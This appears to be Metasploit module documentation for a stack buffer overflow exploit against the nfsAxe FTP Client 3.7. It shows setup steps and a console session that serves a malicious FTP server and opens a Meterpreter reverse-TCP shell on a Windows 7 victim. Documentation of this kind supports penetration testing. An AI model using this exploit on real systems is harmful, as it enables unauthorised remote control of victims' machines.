1.4 KiB
1.4 KiB
LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow
Introduction
nfsAxe is NFS client an NFS server for Windows, which also includes an FTP client, Telnet, LPD & LPR and TFTP.
Vulnerable Application
The vulnerable copy can be downloaded from Exploit-DB. Tested on Windows 7 Enterprise SP1.
Verification Steps
- Install the application
- Start
msfconsole - Do:
use exploit/windows/ftp/labf_nfsaxe - Set options and payload
- Do:
exploit - Connect to the FTP server using the FTP client
- You should get a session
Scenarios
msf > use exploit/windows/ftp/labf_nfsax
msf exploit(windows/ftp/labf_nfsax) > set SRVHOST 192.168.216.3
SRVHOST => 192.168.216.3
msf exploit(windows/ftp/labf_nfsax) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/labf_nfsax) > set LHOST 192.168.216.3
LHOST => 192.168.216.3
msf exploit(windows/ftp/labf_nfsax) > run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.216.3:4444
[*] Server started.
msf exploit(windows/ftp/labf_nfsax) > [*] Sending stage (179779 bytes) to 192.168.216.90
[*] Meterpreter session 1 opened (192.168.216.3:4444 -> 192.168.216.90:49161) at 2018-01-04 14:46:26 +0000